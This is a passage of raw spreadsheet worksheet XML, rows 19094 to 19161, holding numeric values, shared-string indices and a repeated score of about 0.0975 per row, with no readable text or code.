        <v>1.0</v>
      </c>
      <c r="E19094" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19094" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19095" ht="15.75" customHeight="1">
      <c r="A19095" s="1">
        <v>5063.0</v>
      </c>
      <c r="B19095" s="2">
        <v>4.4372545E7</v>
      </c>
      <c r="C19095" s="2" t="s">
        <v>18401</v>
      </c>
      <c r="D19095" s="2">
        <v>1.0</v>
      </c>
      <c r="E19095" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19095" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19096" ht="15.75" customHeight="1">
      <c r="A19096" s="1">
        <v>5367.0</v>
      </c>
      <c r="B19096" s="2">
        <v>4.5381227E7</v>
      </c>
      <c r="C19096" s="2" t="s">
        <v>18402</v>
      </c>
      <c r="D19096" s="2">
        <v>1.0</v>
      </c>
      <c r="E19096" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19096" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19097" ht="15.75" customHeight="1">
      <c r="A19097" s="1">
        <v>6683.0</v>
      </c>
      <c r="B19097" s="2">
        <v>4.9179039E7</v>
      </c>
      <c r="C19097" s="2" t="s">
        <v>18403</v>
      </c>
      <c r="D19097" s="2">
        <v>1.0</v>
      </c>
      <c r="E19097" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19097" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19098" ht="15.75" customHeight="1">
      <c r="A19098" s="1">
        <v>7187.0</v>
      </c>
      <c r="B19098" s="2">
        <v>5.0573182E7</v>
      </c>
      <c r="C19098" s="2" t="s">
        <v>18404</v>
      </c>
      <c r="D19098" s="2">
        <v>1.0</v>
      </c>
      <c r="E19098" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19098" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19099" ht="15.75" customHeight="1">
      <c r="A19099" s="1">
        <v>8500.0</v>
      </c>
      <c r="B19099" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C19099" s="2" t="s">
        <v>18405</v>
      </c>
      <c r="D19099" s="2">
        <v>1.0</v>
      </c>
      <c r="E19099" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19099" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19100" ht="15.75" customHeight="1">
      <c r="A19100" s="1">
        <v>8657.0</v>
      </c>
      <c r="B19100" s="2">
        <v>5.4354104E7</v>
      </c>
      <c r="C19100" s="2" t="s">
        <v>18406</v>
      </c>
      <c r="D19100" s="2">
        <v>1.0</v>
      </c>
      <c r="E19100" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19100" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19101" ht="15.75" customHeight="1">
      <c r="A19101" s="1">
        <v>8913.0</v>
      </c>
      <c r="B19101" s="2">
        <v>5.4814632E7</v>
      </c>
      <c r="C19101" s="2" t="s">
        <v>18407</v>
      </c>
      <c r="D19101" s="2">
        <v>1.0</v>
      </c>
      <c r="E19101" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19101" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19102" ht="15.75" customHeight="1">
      <c r="A19102" s="1">
        <v>9424.0</v>
      </c>
      <c r="B19102" s="2">
        <v>5.5795084E7</v>
      </c>
      <c r="C19102" s="2" t="s">
        <v>18408</v>
      </c>
      <c r="D19102" s="2">
        <v>1.0</v>
      </c>
      <c r="E19102" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19102" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19103" ht="15.75" customHeight="1">
      <c r="A19103" s="1">
        <v>9495.0</v>
      </c>
      <c r="B19103" s="2">
        <v>5.5917992E7</v>
      </c>
      <c r="C19103" s="2" t="s">
        <v>18409</v>
      </c>
      <c r="D19103" s="2">
        <v>1.0</v>
      </c>
      <c r="E19103" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19103" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19104" ht="15.75" customHeight="1">
      <c r="A19104" s="1">
        <v>10571.0</v>
      </c>
      <c r="B19104" s="2">
        <v>1.2964169E7</v>
      </c>
      <c r="C19104" s="2" t="s">
        <v>18410</v>
      </c>
      <c r="D19104" s="2">
        <v>1.0</v>
      </c>
      <c r="E19104" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19104" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19105" ht="15.75" customHeight="1">
      <c r="A19105" s="1">
        <v>10878.0</v>
      </c>
      <c r="B19105" s="2">
        <v>1.6471201E7</v>
      </c>
      <c r="C19105" s="2" t="s">
        <v>18411</v>
      </c>
      <c r="D19105" s="2">
        <v>1.0</v>
      </c>
      <c r="E19105" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19105" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19106" ht="15.75" customHeight="1">
      <c r="A19106" s="1">
        <v>11085.0</v>
      </c>
      <c r="B19106" s="2">
        <v>1.8477466E7</v>
      </c>
      <c r="C19106" s="2" t="s">
        <v>18412</v>
      </c>
      <c r="D19106" s="2">
        <v>1.0</v>
      </c>
      <c r="E19106" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19106" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19107" ht="15.75" customHeight="1">
      <c r="A19107" s="1">
        <v>12395.0</v>
      </c>
      <c r="B19107" s="2">
        <v>2.8929166E7</v>
      </c>
      <c r="C19107" s="2" t="s">
        <v>18413</v>
      </c>
      <c r="D19107" s="2">
        <v>1.0</v>
      </c>
      <c r="E19107" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19107" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19108" ht="15.75" customHeight="1">
      <c r="A19108" s="1">
        <v>13223.0</v>
      </c>
      <c r="B19108" s="2">
        <v>3.4229909E7</v>
      </c>
      <c r="C19108" s="2" t="s">
        <v>18414</v>
      </c>
      <c r="D19108" s="2">
        <v>1.0</v>
      </c>
      <c r="E19108" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19108" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19109" ht="15.75" customHeight="1">
      <c r="A19109" s="1">
        <v>13715.0</v>
      </c>
      <c r="B19109" s="2">
        <v>3.6297004E7</v>
      </c>
      <c r="C19109" s="2" t="s">
        <v>18415</v>
      </c>
      <c r="D19109" s="2">
        <v>1.0</v>
      </c>
      <c r="E19109" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19109" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19110" ht="15.75" customHeight="1">
      <c r="A19110" s="1">
        <v>15394.0</v>
      </c>
      <c r="B19110" s="2">
        <v>4.2807813E7</v>
      </c>
      <c r="C19110" s="2" t="s">
        <v>18416</v>
      </c>
      <c r="D19110" s="2">
        <v>1.0</v>
      </c>
      <c r="E19110" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19110" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19111" ht="15.75" customHeight="1">
      <c r="A19111" s="1">
        <v>15961.0</v>
      </c>
      <c r="B19111" s="2">
        <v>4.4776834E7</v>
      </c>
      <c r="C19111" s="2" t="s">
        <v>18417</v>
      </c>
      <c r="D19111" s="2">
        <v>1.0</v>
      </c>
      <c r="E19111" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19111" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19112" ht="15.75" customHeight="1">
      <c r="A19112" s="1">
        <v>16183.0</v>
      </c>
      <c r="B19112" s="2">
        <v>4.5653148E7</v>
      </c>
      <c r="C19112" s="2" t="s">
        <v>18418</v>
      </c>
      <c r="D19112" s="2">
        <v>1.0</v>
      </c>
      <c r="E19112" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19112" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19113" ht="15.75" customHeight="1">
      <c r="A19113" s="1">
        <v>16502.0</v>
      </c>
      <c r="B19113" s="2">
        <v>4.6594267E7</v>
      </c>
      <c r="C19113" s="2" t="s">
        <v>18419</v>
      </c>
      <c r="D19113" s="2">
        <v>1.0</v>
      </c>
      <c r="E19113" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19113" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19114" ht="15.75" customHeight="1">
      <c r="A19114" s="1">
        <v>16565.0</v>
      </c>
      <c r="B19114" s="2">
        <v>4.6868032E7</v>
      </c>
      <c r="C19114" s="2" t="s">
        <v>18420</v>
      </c>
      <c r="D19114" s="2">
        <v>1.0</v>
      </c>
      <c r="E19114" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19114" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19115" ht="15.75" customHeight="1">
      <c r="A19115" s="1">
        <v>16577.0</v>
      </c>
      <c r="B19115" s="2">
        <v>4.690673E7</v>
      </c>
      <c r="C19115" s="2" t="s">
        <v>18421</v>
      </c>
      <c r="D19115" s="2">
        <v>1.0</v>
      </c>
      <c r="E19115" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19115" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19116" ht="15.75" customHeight="1">
      <c r="A19116" s="1">
        <v>16589.0</v>
      </c>
      <c r="B19116" s="2">
        <v>4.6967361E7</v>
      </c>
      <c r="C19116" s="2" t="s">
        <v>18422</v>
      </c>
      <c r="D19116" s="2">
        <v>1.0</v>
      </c>
      <c r="E19116" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19116" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19117" ht="15.75" customHeight="1">
      <c r="A19117" s="1">
        <v>17818.0</v>
      </c>
      <c r="B19117" s="2">
        <v>5.0905824E7</v>
      </c>
      <c r="C19117" s="2" t="s">
        <v>18423</v>
      </c>
      <c r="D19117" s="2">
        <v>1.0</v>
      </c>
      <c r="E19117" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19117" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19118" ht="15.75" customHeight="1">
      <c r="A19118" s="1">
        <v>19059.0</v>
      </c>
      <c r="B19118" s="2">
        <v>5.4596065E7</v>
      </c>
      <c r="C19118" s="2" t="s">
        <v>18424</v>
      </c>
      <c r="D19118" s="2">
        <v>1.0</v>
      </c>
      <c r="E19118" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19118" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19119" ht="15.75" customHeight="1">
      <c r="A19119" s="1">
        <v>19488.0</v>
      </c>
      <c r="B19119" s="2">
        <v>5.5858545E7</v>
      </c>
      <c r="C19119" s="2" t="s">
        <v>18425</v>
      </c>
      <c r="D19119" s="2">
        <v>1.0</v>
      </c>
      <c r="E19119" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19119" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19120" ht="15.75" customHeight="1">
      <c r="A19120" s="1">
        <v>19503.0</v>
      </c>
      <c r="B19120" s="2">
        <v>5.5913123E7</v>
      </c>
      <c r="C19120" s="2" t="s">
        <v>18426</v>
      </c>
      <c r="D19120" s="2">
        <v>1.0</v>
      </c>
      <c r="E19120" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19120" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19121" ht="15.75" customHeight="1">
      <c r="A19121" s="1">
        <v>19879.0</v>
      </c>
      <c r="B19121" s="2">
        <v>5.7249885E7</v>
      </c>
      <c r="C19121" s="2" t="s">
        <v>18427</v>
      </c>
      <c r="D19121" s="2">
        <v>1.0</v>
      </c>
      <c r="E19121" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19121" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19122" ht="15.75" customHeight="1">
      <c r="A19122" s="1">
        <v>21851.0</v>
      </c>
      <c r="B19122" s="2">
        <v>2.7173801E7</v>
      </c>
      <c r="C19122" s="2" t="s">
        <v>18428</v>
      </c>
      <c r="D19122" s="2">
        <v>1.0</v>
      </c>
      <c r="E19122" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19122" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19123" ht="15.75" customHeight="1">
      <c r="A19123" s="1">
        <v>22947.0</v>
      </c>
      <c r="B19123" s="2">
        <v>4889825.0</v>
      </c>
      <c r="C19123" s="2" t="s">
        <v>18429</v>
      </c>
      <c r="D19123" s="2">
        <v>1.0</v>
      </c>
      <c r="E19123" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19123" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19124" ht="15.75" customHeight="1">
      <c r="A19124" s="1">
        <v>23212.0</v>
      </c>
      <c r="B19124" s="2">
        <v>5.2719746E7</v>
      </c>
      <c r="C19124" s="2" t="s">
        <v>18430</v>
      </c>
      <c r="D19124" s="2">
        <v>1.0</v>
      </c>
      <c r="E19124" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19124" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19125" ht="15.75" customHeight="1">
      <c r="A19125" s="1">
        <v>23509.0</v>
      </c>
      <c r="B19125" s="2">
        <v>5825177.0</v>
      </c>
      <c r="C19125" s="2" t="s">
        <v>18431</v>
      </c>
      <c r="D19125" s="2">
        <v>1.0</v>
      </c>
      <c r="E19125" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19125" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19126" ht="15.75" customHeight="1">
      <c r="A19126" s="1">
        <v>23528.0</v>
      </c>
      <c r="B19126" s="2">
        <v>5887055.0</v>
      </c>
      <c r="C19126" s="2" t="s">
        <v>18432</v>
      </c>
      <c r="D19126" s="2">
        <v>1.0</v>
      </c>
      <c r="E19126" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19126" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19127" ht="15.75" customHeight="1">
      <c r="A19127" s="1">
        <v>24093.0</v>
      </c>
      <c r="B19127" s="2">
        <v>9790238.0</v>
      </c>
      <c r="C19127" s="2" t="s">
        <v>18433</v>
      </c>
      <c r="D19127" s="2">
        <v>1.0</v>
      </c>
      <c r="E19127" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19127" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19128" ht="15.75" customHeight="1">
      <c r="A19128" s="1">
        <v>24342.0</v>
      </c>
      <c r="B19128" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C19128" s="2" t="s">
        <v>18434</v>
      </c>
      <c r="D19128" s="2">
        <v>1.0</v>
      </c>
      <c r="E19128" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19128" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19129" ht="15.75" customHeight="1">
      <c r="A19129" s="1">
        <v>26666.0</v>
      </c>
      <c r="B19129" s="2">
        <v>1.8062124E7</v>
      </c>
      <c r="C19129" s="2" t="s">
        <v>18435</v>
      </c>
      <c r="D19129" s="2">
        <v>1.0</v>
      </c>
      <c r="E19129" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19129" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19130" ht="15.75" customHeight="1">
      <c r="A19130" s="1">
        <v>28907.0</v>
      </c>
      <c r="B19130" s="2">
        <v>2.9416224E7</v>
      </c>
      <c r="C19130" s="2" t="s">
        <v>18436</v>
      </c>
      <c r="D19130" s="2">
        <v>1.0</v>
      </c>
      <c r="E19130" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19130" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19131" ht="15.75" customHeight="1">
      <c r="A19131" s="1">
        <v>29176.0</v>
      </c>
      <c r="B19131" s="2">
        <v>3.0708875E7</v>
      </c>
      <c r="C19131" s="2" t="s">
        <v>18437</v>
      </c>
      <c r="D19131" s="2">
        <v>1.0</v>
      </c>
      <c r="E19131" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19131" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19132" ht="15.75" customHeight="1">
      <c r="A19132" s="1">
        <v>31200.0</v>
      </c>
      <c r="B19132" s="2">
        <v>4921456.0</v>
      </c>
      <c r="C19132" s="2" t="s">
        <v>18438</v>
      </c>
      <c r="D19132" s="2">
        <v>1.0</v>
      </c>
      <c r="E19132" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19132" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19133" ht="15.75" customHeight="1">
      <c r="A19133" s="1">
        <v>32184.0</v>
      </c>
      <c r="B19133" s="2">
        <v>5.4664455E7</v>
      </c>
      <c r="C19133" s="2" t="s">
        <v>18439</v>
      </c>
      <c r="D19133" s="2">
        <v>1.0</v>
      </c>
      <c r="E19133" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19133" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19134" ht="15.75" customHeight="1">
      <c r="A19134" s="1">
        <v>34107.0</v>
      </c>
      <c r="B19134" s="2">
        <v>9703826.0</v>
      </c>
      <c r="C19134" s="2" t="s">
        <v>18440</v>
      </c>
      <c r="D19134" s="2">
        <v>1.0</v>
      </c>
      <c r="E19134" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19134" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="19135" ht="15.75" customHeight="1">
      <c r="A19135" s="1">
        <v>545.0</v>
      </c>
      <c r="B19135" s="2">
        <v>1.8727367E7</v>
      </c>
      <c r="C19135" s="2" t="s">
        <v>18441</v>
      </c>
      <c r="D19135" s="2">
        <v>1.0</v>
      </c>
      <c r="E19135" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19135" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19136" ht="15.75" customHeight="1">
      <c r="A19136" s="1">
        <v>681.0</v>
      </c>
      <c r="B19136" s="2">
        <v>2.0290891E7</v>
      </c>
      <c r="C19136" s="2" t="s">
        <v>18442</v>
      </c>
      <c r="D19136" s="2">
        <v>1.0</v>
      </c>
      <c r="E19136" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19136" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19137" ht="15.75" customHeight="1">
      <c r="A19137" s="1">
        <v>790.0</v>
      </c>
      <c r="B19137" s="2">
        <v>2.1211899E7</v>
      </c>
      <c r="C19137" s="2" t="s">
        <v>18443</v>
      </c>
      <c r="D19137" s="2">
        <v>1.0</v>
      </c>
      <c r="E19137" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19137" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19138" ht="15.75" customHeight="1">
      <c r="A19138" s="1">
        <v>1336.0</v>
      </c>
      <c r="B19138" s="2">
        <v>2.5853013E7</v>
      </c>
      <c r="C19138" s="2" t="s">
        <v>18444</v>
      </c>
      <c r="D19138" s="2">
        <v>1.0</v>
      </c>
      <c r="E19138" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19138" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19139" ht="15.75" customHeight="1">
      <c r="A19139" s="1">
        <v>2251.0</v>
      </c>
      <c r="B19139" s="2">
        <v>3.2356581E7</v>
      </c>
      <c r="C19139" s="2" t="s">
        <v>18445</v>
      </c>
      <c r="D19139" s="2">
        <v>1.0</v>
      </c>
      <c r="E19139" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19139" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19140" ht="15.75" customHeight="1">
      <c r="A19140" s="1">
        <v>2638.0</v>
      </c>
      <c r="B19140" s="2">
        <v>3.4598983E7</v>
      </c>
      <c r="C19140" s="2" t="s">
        <v>18446</v>
      </c>
      <c r="D19140" s="2">
        <v>1.0</v>
      </c>
      <c r="E19140" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19140" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19141" ht="15.75" customHeight="1">
      <c r="A19141" s="1">
        <v>2700.0</v>
      </c>
      <c r="B19141" s="2">
        <v>3.4853902E7</v>
      </c>
      <c r="C19141" s="2" t="s">
        <v>18447</v>
      </c>
      <c r="D19141" s="2">
        <v>1.0</v>
      </c>
      <c r="E19141" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19141" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19142" ht="15.75" customHeight="1">
      <c r="A19142" s="1">
        <v>2738.0</v>
      </c>
      <c r="B19142" s="2">
        <v>3.5002762E7</v>
      </c>
      <c r="C19142" s="2" t="s">
        <v>18448</v>
      </c>
      <c r="D19142" s="2">
        <v>1.0</v>
      </c>
      <c r="E19142" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19142" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19143" ht="15.75" customHeight="1">
      <c r="A19143" s="1">
        <v>2845.0</v>
      </c>
      <c r="B19143" s="2">
        <v>3.5466884E7</v>
      </c>
      <c r="C19143" s="2" t="s">
        <v>18449</v>
      </c>
      <c r="D19143" s="2">
        <v>1.0</v>
      </c>
      <c r="E19143" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19143" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19144" ht="15.75" customHeight="1">
      <c r="A19144" s="1">
        <v>3015.0</v>
      </c>
      <c r="B19144" s="2">
        <v>3.6383657E7</v>
      </c>
      <c r="C19144" s="2" t="s">
        <v>18450</v>
      </c>
      <c r="D19144" s="2">
        <v>1.0</v>
      </c>
      <c r="E19144" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19144" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19145" ht="15.75" customHeight="1">
      <c r="A19145" s="1">
        <v>3307.0</v>
      </c>
      <c r="B19145" s="2">
        <v>3.7590043E7</v>
      </c>
      <c r="C19145" s="2" t="s">
        <v>18451</v>
      </c>
      <c r="D19145" s="2">
        <v>1.0</v>
      </c>
      <c r="E19145" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19145" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19146" ht="15.75" customHeight="1">
      <c r="A19146" s="1">
        <v>3618.0</v>
      </c>
      <c r="B19146" s="2">
        <v>3.9185141E7</v>
      </c>
      <c r="C19146" s="2" t="s">
        <v>18452</v>
      </c>
      <c r="D19146" s="2">
        <v>1.0</v>
      </c>
      <c r="E19146" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19146" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19147" ht="15.75" customHeight="1">
      <c r="A19147" s="1">
        <v>3940.0</v>
      </c>
      <c r="B19147" s="2">
        <v>4.0604687E7</v>
      </c>
      <c r="C19147" s="2" t="s">
        <v>18453</v>
      </c>
      <c r="D19147" s="2">
        <v>1.0</v>
      </c>
      <c r="E19147" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19147" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19148" ht="15.75" customHeight="1">
      <c r="A19148" s="1">
        <v>3989.0</v>
      </c>
      <c r="B19148" s="2">
        <v>4.0854413E7</v>
      </c>
      <c r="C19148" s="2" t="s">
        <v>18454</v>
      </c>
      <c r="D19148" s="2">
        <v>1.0</v>
      </c>
      <c r="E19148" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19148" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19149" ht="15.75" customHeight="1">
      <c r="A19149" s="1">
        <v>4169.0</v>
      </c>
      <c r="B19149" s="2">
        <v>4.1549267E7</v>
      </c>
      <c r="C19149" s="2" t="s">
        <v>18455</v>
      </c>
      <c r="D19149" s="2">
        <v>1.0</v>
      </c>
      <c r="E19149" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19149" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19150" ht="15.75" customHeight="1">
      <c r="A19150" s="1">
        <v>4254.0</v>
      </c>
      <c r="B19150" s="2">
        <v>4.181164E7</v>
      </c>
      <c r="C19150" s="2" t="s">
        <v>18456</v>
      </c>
      <c r="D19150" s="2">
        <v>1.0</v>
      </c>
      <c r="E19150" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19150" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19151" ht="15.75" customHeight="1">
      <c r="A19151" s="1">
        <v>4333.0</v>
      </c>
      <c r="B19151" s="2">
        <v>4.2051888E7</v>
      </c>
      <c r="C19151" s="2" t="s">
        <v>18457</v>
      </c>
      <c r="D19151" s="2">
        <v>1.0</v>
      </c>
      <c r="E19151" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19151" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19152" ht="15.75" customHeight="1">
      <c r="A19152" s="1">
        <v>4512.0</v>
      </c>
      <c r="B19152" s="2">
        <v>4.2592025E7</v>
      </c>
      <c r="C19152" s="2" t="s">
        <v>18458</v>
      </c>
      <c r="D19152" s="2">
        <v>1.0</v>
      </c>
      <c r="E19152" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19152" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19153" ht="15.75" customHeight="1">
      <c r="A19153" s="1">
        <v>4785.0</v>
      </c>
      <c r="B19153" s="2">
        <v>4.3453868E7</v>
      </c>
      <c r="C19153" s="2" t="s">
        <v>18459</v>
      </c>
      <c r="D19153" s="2">
        <v>1.0</v>
      </c>
      <c r="E19153" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19153" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19154" ht="15.75" customHeight="1">
      <c r="A19154" s="1">
        <v>4856.0</v>
      </c>
      <c r="B19154" s="2">
        <v>4.3782674E7</v>
      </c>
      <c r="C19154" s="2" t="s">
        <v>18460</v>
      </c>
      <c r="D19154" s="2">
        <v>1.0</v>
      </c>
      <c r="E19154" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19154" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19155" ht="15.75" customHeight="1">
      <c r="A19155" s="1">
        <v>4934.0</v>
      </c>
      <c r="B19155" s="2">
        <v>4.3999775E7</v>
      </c>
      <c r="C19155" s="2" t="s">
        <v>18461</v>
      </c>
      <c r="D19155" s="2">
        <v>1.0</v>
      </c>
      <c r="E19155" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19155" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19156" ht="15.75" customHeight="1">
      <c r="A19156" s="1">
        <v>5339.0</v>
      </c>
      <c r="B19156" s="2">
        <v>4.5330182E7</v>
      </c>
      <c r="C19156" s="2" t="s">
        <v>18462</v>
      </c>
      <c r="D19156" s="2">
        <v>1.0</v>
      </c>
      <c r="E19156" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19156" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19157" ht="15.75" customHeight="1">
      <c r="A19157" s="1">
        <v>5497.0</v>
      </c>
      <c r="B19157" s="2">
        <v>4.5807972E7</v>
      </c>
      <c r="C19157" s="2" t="s">
        <v>18463</v>
      </c>
      <c r="D19157" s="2">
        <v>1.0</v>
      </c>
      <c r="E19157" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19157" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19158" ht="15.75" customHeight="1">
      <c r="A19158" s="1">
        <v>5529.0</v>
      </c>
      <c r="B19158" s="2">
        <v>4.5877041E7</v>
      </c>
      <c r="C19158" s="2" t="s">
        <v>18464</v>
      </c>
      <c r="D19158" s="2">
        <v>1.0</v>
      </c>
      <c r="E19158" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19158" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19159" ht="15.75" customHeight="1">
      <c r="A19159" s="1">
        <v>6049.0</v>
      </c>
      <c r="B19159" s="2">
        <v>4.7608542E7</v>
      </c>
      <c r="C19159" s="2" t="s">
        <v>18465</v>
      </c>
      <c r="D19159" s="2">
        <v>1.0</v>
      </c>
      <c r="E19159" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19159" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19160" ht="15.75" customHeight="1">
      <c r="A19160" s="1">
        <v>6448.0</v>
      </c>
      <c r="B19160" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C19160" s="2" t="s">
        <v>18466</v>
      </c>
      <c r="D19160" s="2">
        <v>1.0</v>
      </c>
      <c r="E19160" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19160" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19161" ht="15.75" customHeight="1">
      <c r="A19161" s="1">
        <v>6480.0</v>
      </c>
      <c r="B19161" s="2">
        <v>4.8666647E7</v>
      </c>
      <c r="C19161" s="2" t="s">
        <v>18467</v>
      </c>
      <c r="D19161" s="2">
